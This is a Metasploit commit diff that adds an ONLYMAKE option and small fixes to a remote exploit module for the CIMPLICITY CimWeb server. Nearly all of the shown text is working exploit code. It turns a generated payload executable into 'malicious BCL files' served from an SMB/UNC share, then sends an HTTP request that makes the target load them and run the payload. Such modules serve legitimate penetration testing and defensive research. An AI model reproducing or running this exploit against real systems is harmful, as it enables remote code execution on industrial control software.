Add small fixes and clean up

bug/bundler_fix
jvazquez-r7 2014-02-25 15:25:01 -06:00
parent 1d4b2ea60d
commit cb18639b66
1 changed files with 16 additions and 6 deletions


@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(80),
OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]),
OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]),
OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]),
OptBool.new('ONLYMAKE', [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]),
OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/'])
], self.class)
end
@ -184,9 +185,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("BCL's available at #{@exploit_unc}#{@share_name}\\#{@basename}{i}.bcl")
unless datastore['UNCPATH'].blank?
print_warning("Remember to upload the BCL files to the remote share!")
@bcls.each_index { |i| file_create("#{@basename}#{i}.bcl", @bcls[i]) }
exploit_bcl
if datastore['ONLYMAKE']
print_warning("Files created, remember to upload the BCL files to the remote share!")
print_warning("Once ready set ONLYMAKE to false")
else
exploit_bcl
end
return
end
@ -221,11 +226,13 @@ class Metasploit3 < Msf::Exploit::Remote
def make_bcls
exe = generate_payload_exe
# Padding to be sure we're aligned to 4 bytes.
exe << "\x00" until exe.length % 4 == 0
longs = exe.unpack("l*")
offset = 0
# gefebt.exe isn't able to handle (on my test environment) long
# arrays bigger than 16000, so we need to split it.
while longs.length > 0
parts = longs.slice!(0, 16000)
@bcls << generate_bcl(parts , offset)
@ -241,7 +248,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
<<-EOF
Declare Function cor_IsTerminalServicesEnabled Lib "fasrtl" As Boolean
Option CStrings On
Sub Main()
@ -267,9 +273,13 @@ End Sub
res = send_request_cgi('uri' => uri)
# We use res.to_s because the embedded CIMPLICITY Web server doesn't
# answer with valid HTTP responses.
if res and res.code == 200 and res.to_s =~ /(^Error.*$)/
print_error("#{peer} - Server answered with error: $1")
fail_with(Failure::Unknown, "#{peer} - Server answered with error")
elsif res and res.code == 200 and res.to_s =~ /No such file or directory/
fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file")
elsif res and res.code == 200
print_good("#{peer} - Answer has been successful")
else